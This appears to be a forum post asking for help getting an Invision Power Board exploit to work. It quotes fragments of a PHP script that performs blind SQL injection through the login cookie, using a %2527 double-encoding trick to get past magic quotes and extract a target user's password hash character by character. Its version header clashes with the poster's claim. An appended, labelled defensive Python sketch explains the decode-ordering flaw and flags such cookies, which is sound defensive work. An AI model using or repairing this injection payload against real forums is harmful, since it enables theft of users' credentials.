I found this exploit for Invision Power Board. It should work up to version 2.0.3. So I installed a test forum (version 2.0.3) on my localhost, but I can't get it to work.
- First of all, has anybody gotten it to work?
- Second, I tried to use this script (of course I corrected the server and file variables); it didn't work, I just get 0s for the result.
- Is there maybe a problem with the user id? (I have 2 users on my test forum; I changed the variable id to 1.) It didn't work.
<= 1.3.1 Final
$server = "SERVER";
$port = 80;
$file = "PATH";
$target = 81;
/* User id and password used to fake-logon are not important. '10' is a
random number. */
$id = 10;
$pass = "";
/* %2527 translates to %27, which gets past magic quotes. This is translated to ' by urldecode. */
$cookie .="%20HAVING%20id=$target%20AND%20MID(`password`,$i,1)=%2527" . $letter;
/* Query is in effect: SELECT * FROM ibf_members
WHERE id=$id AND password='$pass' OR id=$target
HAVING id=$target AND MID(`password`,$i,1)='$letter' */
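
Added example, not part of the original post or of the script it quotes: a defender-side sketch of the ordering flaw described in the `%2527` comment above (escaping runs before the last URL-decode), together with a check that flags cookie values whose quote only appears after a second decode. The `addslashes` stand-in, the function names and the sample values are assumptions constructed for illustration.

```python
from urllib.parse import unquote

def addslashes(s: str) -> str:
    """Rough stand-in for PHP magic quotes (assumption, not PHP's own code)."""
    return "".join("\\" + c if c in "'\"\\" else c for c in s)

def escape_then_decode(raw_cookie: str) -> str:
    """Flawed order from the comment: escape first, urldecode afterwards."""
    once = unquote(raw_cookie)   # PHP decodes the cookie once: %2527 -> %27
    escaped = addslashes(once)   # no quote character present yet, nothing escaped
    return unquote(escaped)      # application urldecode: %27 -> ' (unescaped)

def decode_then_escape(raw_cookie: str) -> str:
    """Corrected order: finish all decoding, then escape the final value."""
    return addslashes(unquote(unquote(raw_cookie)))

def decode_depth(raw: str, limit: int = 5):
    """Decode until the value stops changing; return (canonical, rounds)."""
    current, rounds = raw, 0
    while rounds < limit:
        decoded = unquote(current)
        if decoded == current:
            break
        current, rounds = decoded, rounds + 1
    return current, rounds

def flag_cookie(raw: str) -> bool:
    """Flag values that need more than one decode to reveal a quote or backslash."""
    canonical, rounds = decode_depth(raw)
    return rounds > 1 and any(c in canonical for c in "'\"\\")

# Constructed sample cookie values (not taken from real traffic).
SAMPLES = ["d41d8cd98f00b204", "abc%27", "abc%2527"]

if __name__ == "__main__":
    for value in SAMPLES:
        print(value, "->", repr(escape_then_decode(value)),
              "| corrected:", repr(decode_then_escape(value)),
              "| flagged:", flag_cookie(value))
```

Escaping in the right order only narrows the problem; binding the cookie value as a parameter of a prepared statement removes the dependency on decode order altogether.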